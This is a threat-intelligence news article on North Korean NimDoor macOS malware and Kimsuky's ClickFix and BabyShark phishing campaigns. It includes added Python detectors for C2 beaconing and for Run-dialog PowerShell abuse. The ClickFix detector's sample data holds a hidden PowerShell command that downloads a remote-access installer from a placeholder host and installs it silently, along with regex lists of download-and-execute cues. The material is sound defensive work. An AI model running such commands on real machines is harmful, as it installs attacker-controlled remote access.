North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign

By user, July 2, 2025
Threat actors associated with North Korea have been observed targeting Web3 and cryptocurrency businesses with malware written in the Nim programming language, highlighting the constant evolution of their tactics.

“In the case of macOS malware, threat actors employ process injection techniques and remote communication via WSS, the TLS-encrypted version of the WebSocket protocol,” SentinelOne researchers Phil Stokes and Raffaele Sabato said in a report shared with The Hacker News.

“The new persistence mechanism utilizes SIGINT/SIGTERM signal handlers to install persistence when the malware ends or when the system is restarted.”

The cybersecurity company tracks the malware components collectively under the name NimDoor. It is worth noting that some aspects of the campaign were previously documented by Huntabil.IT.

The attack chain involves social engineering tactics in which the attackers approach targets on messaging platforms such as Telegram and schedule Zoom meetings via Calendly, the appointment-scheduling software. The target then receives an email with a Zoom meeting link and instructions to run a “Zoom SDK update script” to ensure they are running the latest version of the video conferencing software.

This step runs an AppleScript that acts as a delivery vehicle for a second-stage script from a remote server, while ostensibly redirecting the user to a legitimate Zoom redirect link. The newly downloaded script then extracts a ZIP archive containing the binaries responsible for setting up persistence and launching an information-stealing bash script.

At the heart of the infection sequence is a C++ loader called InjectWithDyldArm64 (also known as InjectWithDyld), which decrypts two embedded binaries named Target and Trojan1_arm64. InjectWithDyldArm64 launches Target in a suspended state, injects the binary code from Trojan1_arm64, and then resumes execution of the suspended process.

The injected malware then establishes communication with a remote server and obtains commands that allow it to collect system information, execute arbitrary commands, and change or set the current working directory. The results of the execution are sent back to the server.

Trojan1_arm64, for its part, can download two more payloads, which are equipped to collect credentials from web browsers such as Arc, Brave, Google Chrome, Microsoft Edge and Mozilla Firefox, and to extract data from the Telegram application.

Also dropped as part of the attack is a collection of Nim-based executables used as launchpads for CoreKitAgent, which monitors for user attempts to kill the malware processes and ensures persistence.

“This behavior causes user-initiated malware termination to result in the deployment of core components, making the code resilient to basic defensive actions,” the researchers said.

The malware also beacons every 30 seconds to one of two hard-coded command-and-control (C2) servers, while also collecting a snapshot of the list of running processes and running additional scripts sent by the server.
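The fixed 30-second beacon interval described above is something a defender can look for in connection logs. The following is an added example (not code from the SentinelOne report or this article) that groups outbound connections by source and destination and flags flows whose inter-connection gaps are nearly constant; the log lines, hosts and addresses are constructed.

```python
"""Periodic-beacon detector over constructed connection-log records."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log lines: "<epoch> <src_ip> <dst_ip>:<dst_port>".
# 10.0.0.5 talks to one destination every ~30 s; 10.0.0.7 is irregular.
SAMPLE_LOG = """\
1000.0 10.0.0.5 203.0.113.10:443
1030.1 10.0.0.5 203.0.113.10:443
1060.0 10.0.0.5 203.0.113.10:443
1089.9 10.0.0.5 203.0.113.10:443
1120.0 10.0.0.5 203.0.113.10:443
1150.0 10.0.0.5 203.0.113.10:443
1005.0 10.0.0.7 198.51.100.20:443
1012.0 10.0.0.7 198.51.100.20:443
1090.0 10.0.0.7 198.51.100.20:443
1095.0 10.0.0.7 198.51.100.20:443
1400.0 10.0.0.7 198.51.100.20:443
1402.0 10.0.0.7 198.51.100.20:443
"""

def parse_log(text):
    """Group connection timestamps by (src_ip, dst_ip:port)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst = line.split()
        flows[(src, dst)].append(float(ts))
    return flows

def find_beacons(flows, min_conns=5, max_jitter=0.1):
    """Return {(src, dst): mean_gap_seconds} for near-periodic flows.

    A flow is flagged when it has at least `min_conns` connections and the
    coefficient of variation of its gaps (stddev / mean) is <= `max_jitter`,
    i.e. the connections recur at an almost fixed interval.
    """
    hits = {}
    for key, times in flows.items():
        if len(times) < min_conns:
            continue
        times = sorted(times)
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits[key] = round(avg, 1)
    return hits

if __name__ == "__main__":
    for (src, dst), gap in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"possible beacon: {src} -> {dst} every ~{gap}s")
```

Real C2 traffic often adds jitter, so `max_jitter` should be tuned against a baseline of known-good periodic traffic (NTP, update checks) before alerting.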

The findings show that North Korean threat actors are increasingly training their sights on macOS systems, weaponizing Apple's native tooling to act as a post-exploitation backdoor in pursuit of their data collection goals.

“North Korean threat actors have previously experimented with Go and Rust, and similarly combined scripts and binaries into a multi-stage attack chain,” the researchers said.

“However, Nim’s rather unique ability to perform functions at compile time allows attackers to blend complex behavior into a binary with less obvious control flow. As a result, they bring together binaries where developer code and Nim runtime code are mixed together at the function level.”

Kimsuky’s ClickFix Continues

The disclosure comes as Korean cybersecurity company Genians revealed that the North Korean hacking group Kimsuky has been continuously using ClickFix social engineering tactics to deliver a variety of remote access tools as part of a campaign called BabyShark, a known activity cluster attributed to the group.

The attacks, first observed in January 2025 and targeting South Korean national security experts, use spear-phishing emails posing as interview requests from a legitimate German business newspaper to trick recipients into opening malicious links leading to fake RAR archives.

Residing in the archive are Visual Basic Script (VBS) files designed to open a decoy Google Docs file in the user’s web browser. Meanwhile, in the background, malicious code is executed to establish host persistence via scheduled tasks and harvest system information.

Subsequent attacks observed in March 2025 saw the group impersonate U.S. national security officials, deceiving targets into opening a PDF attachment containing a list of questions related to official meetings during their visit to South Korea.

“They also tried to trick the target into opening the manual and entering the authentication code,” Genians said. “The original ‘ClickFix’ tactic allowed users to click to fix a specific error, but this variant corrected their approach by encouraging users to copy and paste the authentication code to access the secure documentation.”

A similar tactic was documented by Proofpoint in April 2025. The difference is that the email messages claimed to come from Japanese diplomats, urging recipients to set up a U.S. meeting with the Japanese ambassador.

When the obfuscated malicious PowerShell command is executed, the decoy Google Docs file is used as a distraction to hide the execution of malicious code that establishes persistent communication with the C2 server, collects data and delivers additional payloads.

The second variant of the ClickFix strategy uses fake websites that mimic a legitimate defense research job portal and creates fake job listings; site visitors who click on these posts are served a ClickFix-style pop-up message that entails opening a Windows Run dialog and running a PowerShell command.

The command, for its part, guides the user to download and install Chrome Remote Desktop software on the system, allowing the attackers remote access via SSH through the C2 server kida.plusdocs.kro[.]kr. Genians said they discovered a directory listing vulnerability in the C2 server.
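Both ClickFix variants above end with the user pasting a PowerShell command into the Windows Run dialog. The following is an added detection example (not code from Genians or this article) that scans Sysmon-style process-creation records for powershell.exe spawned directly by explorer.exe, the lineage a Run-dialog launch produces, whose command line carries a download cue or references a remote-access tool; the field names follow Sysmon Event ID 1 and all records are constructed.

```python
"""Flag Run-dialog PowerShell launches with download or remote-access cues."""
import re

# Command-line fragments commonly seen when PowerShell fetches and runs content.
DOWNLOAD_CUES = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\biex\b|"
    r"invoke-expression|\bcurl\s", re.IGNORECASE)
# Remote-access tools named in the campaigns described above.
REMOTE_ACCESS_CUES = re.compile(
    r"chromeremotedesktop|remotedesktophost|anydesk", re.IGNORECASE)

# Constructed sample records; the first mimics a ClickFix-style command,
# the second is benign, the third has a non-explorer parent (not Run dialog).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/"
                    "chromeremotedesktophost.msi -OutFile $env:TEMP\\h.msi; "
                    "msiexec /i $env:TEMP\\h.msi /qn\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
    {"ParentImage": r"C:\Program Files\Tool\updater.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"iwr http://example.invalid/x -OutFile y\""},
]

def is_run_dialog_powershell(ev):
    """True when powershell.exe was spawned directly by explorer.exe."""
    return (ev["ParentImage"].lower().endswith("\\explorer.exe")
            and ev["Image"].lower().endswith("\\powershell.exe"))

def classify(ev):
    """Return the reasons an event looks like ClickFix-style abuse (may be empty)."""
    reasons = []
    if not is_run_dialog_powershell(ev):
        return reasons
    cmd = ev["CommandLine"]
    if DOWNLOAD_CUES.search(cmd):
        reasons.append("download cue in Run-dialog PowerShell")
    if REMOTE_ACCESS_CUES.search(cmd):
        reasons.append("remote-access tool referenced")
    return reasons

def find_clickfix_candidates(events):
    """Return (index, reasons) for every event with at least one reason."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]
```

Explorer-parented PowerShell also results from shortcuts and context-menu launches, so the command-line cues, not the lineage alone, are what keep this from being noisy.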

The C2 server, which also included an IP address from China, was found to contain keylogging records as well as Proton Drive links hosting the ZIP archives used to drop BabyShark malware on Windows hosts infected via the multi-stage attack chain.

Just last month, Kimsuky is believed to have created a ClickFix campaign in which the threat actor deploys a fake Naver CAPTCHA verification page and has the user copy and paste a PowerShell command into a Windows Run dialog; the command siphons user information and launches an AutoIt script.

“The ‘BabyShark’ campaign is known for its rapid adoption of new attack technologies, and often integrates with script-based mechanisms,” the company said. “The ‘ClickFix’ tactics discussed in this report appear to be another case of publicly available methods that are compatible with malicious use.”

Over the past few weeks, Kimsuky has also been linked to an email phishing campaign that appears to originate from an academic institution but distributes malware under the pretext of reviewing research papers.

“The email prompted the recipient to open an attached HWP document file containing a malicious OLE object,” says AhnLab. “The document was password protected and recipients had to enter the password provided in the email body to view the document.”

Opening the weaponized document activates the infection process, leading to the execution of PowerShell scripts that perform extensive system reconnaissance and the deployment of the legitimate AnyDesk software for persistent remote access.

The prolific Kimsuky threat actor is in a state of constant flux when it comes to malware delivery tools, tactics and techniques, with some of its cyberattacks also leveraging GitHub as a stager to deliver an open-source trojan called Xeno RAT.

“The malware uses hard-coded GitHub Personal Access Tokens (PATs) to access the attacker’s private repository,” says Enki WhiteHat. “This token was used to download malware from the private repository and upload information collected from the victim system.”

According to the Korean cybersecurity vendor, the attack begins with a spear-phishing email carrying a compressed archive attachment that contains a Windows shortcut (LNK) file. This is used to drop PowerShell scripts that download and launch decoy documents, and can also run Xeno RAT and a PowerShell-based information stealer.

Other attack sequences are known to take advantage of a PowerShell-based downloader that retrieves files with RTF extensions from Dropbox and ultimately launches Xeno RAT. The campaign overlaps with another set of attacks that delivers a variant of Xeno RAT known as MoonPeak, with which it shares infrastructure.

“The attacker uploaded and maintained extracts of infected system log files in a private repository using GitHub Personal Access Tokens (PATs), as well as the malware used in the attack,” Enki said. “This ongoing activity highlights the sustained and evolving nature of Kimsuky’s operations, including the use of both GitHub and Dropbox as part of the infrastructure.”

According to NSFOCUS data, Kimsuky, along with Konni, is one of the most active threat groups from North Korea, accounting for 5% of the 44 advanced persistent threat (APT) activities recorded by the Chinese cybersecurity company in May 2025.
